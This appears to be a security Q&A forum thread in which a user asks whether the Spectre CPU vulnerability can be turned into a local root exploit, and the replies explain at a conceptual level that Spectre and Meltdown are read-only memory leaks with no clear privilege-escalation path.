2

I heard that Spectre could be used to reveal arbitrary information from RAM and I imagine it should ultimately be possible to automate getting root this way. At the same time, quite a couple of months passed since this class of vulnerabilities was disclosed and I still hadn't seen any convincing exploit.

Normally I would assume that this is in order to keep script kiddies out, but given that we're likely to stick with broken processors for a few years, anybody who would publish such program would definitely get popular.

This leads me to the question: is it actually possible to get local root via spectre? If so, what could be the reasons why no exploit was published yet?

d33tah
  • 6,524
  • 8
  • 38
  • 60
  • 1
    The exploit is a memory read only, so there is no clear, reliable path to privilege escalation. The PoC to leak information can be found here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1272 – J.A.K. May 30 '18 at 17:43

1 Answers1

2

As mentioned by J.A.K - the exploit (Spectre) is a way of gaining read-only access to the memory. The reason there is no exploit for privilege escalation is that that isn't what is happening in Spectre. Both Spectre and Meltdown by nature are simply just information leaks.